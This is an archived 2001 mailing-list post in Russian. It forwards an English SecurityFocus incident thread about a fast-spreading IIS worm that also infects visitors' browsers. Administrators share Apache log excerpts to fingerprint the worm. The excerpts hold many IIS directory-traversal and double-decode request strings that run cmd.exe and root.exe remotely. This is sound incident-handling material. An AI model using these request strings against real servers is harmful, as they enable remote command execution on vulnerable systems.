ПРОЕКТЫ 


  АРХИВ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  СТАТЬИ 


  ПЕРСОНАЛЬНОЕ 


  ПРОГРАММЫ 



ПИШИТЕ
ПИСЬМА












     АРХИВ :: Inet-Admins
Inet-Admins mailing list archive (inet-admins@info.east.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[inet-admins] Re: CodeBlue finally hitting, or what? (fwd)


  • To: inet-admins@info.east.ru
  • Subject: [inet-admins] Re: CodeBlue finally hitting, or what? (fwd)
  • From: Dmitry Valdov <dv@dv.ru>
  • Date: Tue, 18 Sep 2001 20:49:20 +0400 (MSD)
  • Delivered-to: inet-adm-outgoing@frog.east.ru
  • Delivered-to: inet-admins@info.east.ru

Hi!

Еще один IIS червяк. У меня сейчас в логах апача его запросы валятся 
по несколько экранов в минуту. 

Самое нехорошее, что на зараженных сайтах он модифицирует документ так, что
вылазит окно с якобы email'ом  с аттачем файла readme.exe с типом WAV.
Говорят, что IE5 его запускает без вопросов. 

Так что плюс к тому, что он IIS сервера инфицирует, еще и клиентские машины
тоже.. 

Траффик от него сейчас прет немерянный. :(

Dmitry.



---------- Forwarded message ----------
Date: Tue, 18 Sep 2001 11:36:35 -0400
From: Jason Giglio <jgiglio@netmar.com>
To: "Portnoy, Gary" <gportnoy@belenosinc.com>, incidents@securityfocus.com,
    forensics@securityfocus.com
Subject: Re: CodeBlue finally hitting, or what?

I've gotten 721 hits just today for cmd.exe of some sort.  We run apache so
no worries, but this worm has hit faster than anything I've seen before.

All from the people that share the same class A as us.  This one must scan
it's own class C then B then A first.  (I know I'm probably abusing the
terms, but you all know what I mean)


65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320
65.114.21.16 - - [18/Sep/2001:09:39:32 -0400] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 320





On 2001.09.18 10:24 "Portnoy, Gary" wrote:
> Greetings,
> 
> I am suddenly seeing hundreds of Unicode traversal requests coming in
> from
> all over the world, many of them from previous CodeRed victims.  I am
> guessing someone changed CodeBlue to make it spread faster, because
> before I
> saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least
> 20
> in the last hour.  Just a a way to help fingerprint it, a few of the
> attempted exploits use the multiple decode vulnerability....
> 
> -Gary-
> 
> 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET
> /scripts/root.exe?/c+dir
> HTTP/1.0" 404 287 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
> /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 285 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 326 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
> "-"
> "-"
> 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-"
> "-"
> 
> Gary Portnoy
> Network Administrator
> gportnoy@belenosinc.com
> 
> PGP Fingerprint: 9D69 6A39 642D 78FD 207C  307D B37D E01A 2E89 9D2C
> 
> 
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management 
> and tracking system please see: http://aris.securityfocus.com
> 
> 
--
Jason Giglio
Information Technology Coordinator, Smyth Companies, Bedford VA
Phone: 540-586-2311x113
e-mail: jgiglio@smythco.com

-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com



=============================================================================
"inet-admins" Internet access mailing list. Maintained by East Connection ISP.
Mail "unsubscribe inet-admins" to Majordomo@info.east.ru if you want to quit.
Archive is accessible on http://info.east.ru/rus/inetadm.html



 




Copyright © Lexa Software, 1996-2009.